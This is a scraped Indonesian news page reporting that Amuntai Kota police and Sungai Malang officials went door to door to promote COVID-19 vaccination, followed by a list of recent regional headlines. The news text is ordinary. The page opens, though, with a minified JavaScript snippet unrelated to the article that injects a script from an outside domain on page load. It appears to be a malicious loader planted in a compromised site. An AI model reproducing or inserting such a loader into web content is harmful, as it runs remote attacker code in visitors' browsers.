(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Gencarkan Vaksinasi, Bhabinkamtibmas Amuntai Kota Door to Door ke Rumah Warga


KANALKALIMANTAN.COM, AMUNTAI – Maksimal vaksinasi kepada masyarakat anggota Bhabinkamtibmas Polsek Amuntai Kota bersama aparat Kelurahan Sungai Malang melakukan sosialisasi vaksin Covid-19 kepada door to door ke masyarakat.

Aparat langsung mendatangi rumah warga mendukung program pemerintah dalam rangka percepatan penanggulangan pandemi Covid-19 di Hulu Sungai Utara (HSU).

Aiptu Rofik PN, Bhabinkamtibmas Polsek Amuntai Kota mengatakan, kegiatan ini dianggap efektif untuk memberikan penjelasan kepada masyarakat tentang pentingnya vaksinasi Covid 19, sehingga target kekebalan kelompok atau herd Immunity segera tercapai.

“Kegiatan sosialisasi door to door ini bertujuan agar masyarakat mengetahui lebih jelas tentang manfaat vaksinasi Covid – 19 sehingga kesadaran masyarakat untuk mengikuti program vaksinasi Covid – 19 tinggi atau mencapai target,” jelas Aiptu Rofik, Jum’at (5/11/2021).

 

 

Baca juga: Wali Kota Banjarmasin Ibnu Sina di-PTUN-kan, Satpol PP Target Bongkar 10 Baliho Bando

Lebih lanjut, Aiptu Rofik mengatakan selain melakukan sosialisasi dan edukasi, kegiatan ini juga mendata dan mengajak masyarakat agar mengikuti program vaksinasi yang akan dilaksanakan di aula kantor Kelurahan Sungai Malang dari pukul 09.00 Wita sampai selesai.

Sampai saat ini pencapaian target vaksinasi masih rendah karena kesadaran masyarakat juga rendah tentang vaksinasi, disebabkan berbagai alasan, seperti sudah Lansia, masih anak-anak, sedang hamil dan menderita suatu penyakit. Padahal vaksin yang ada saat ini aman dari segi kesehatan dan halal dari segi agama.

Adapun masalah lainnya yang juga mempengaruhi capaian vaksinasi ini yaitu masih banyaknya masyarakat termakan isu atau berita hoax yang beredar di media sosial tentang dampak buruk vaksin Covid-19.

Baca juga: DPRD Kotabaru Kumpulkan Dinas Terkait Bahas Data Terpadu Kesejahteraan Sosial

“Bagi masyarakat yang lansia, ibu hamil, anak-anak dan yang mengidap suatu penyakit jangan khawatir nanti akan ditangani oleh tenaga kesehatan. yang Masyarakat yang sering beraktifitas di sosial media bijaklah, jangan sampai termakan berita yang tidak benar, nantinya akan merugikan kita sendiri,” imbuhnya.

Sementara itu, Ketua RT 007 Sungai Malang Akhmad Fadillah menyambut baik kegiatan ini, berharap agar masyarakat yang menjadi target sasaran vaksin untuk segera melakukan vaksinasi.(kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

1 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

1 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

2 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

2 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

2 jam ago

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23

KANALKALIMANTAN.COM, BANJARBARU - Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia… Read More

4 jam ago

This website uses cookies.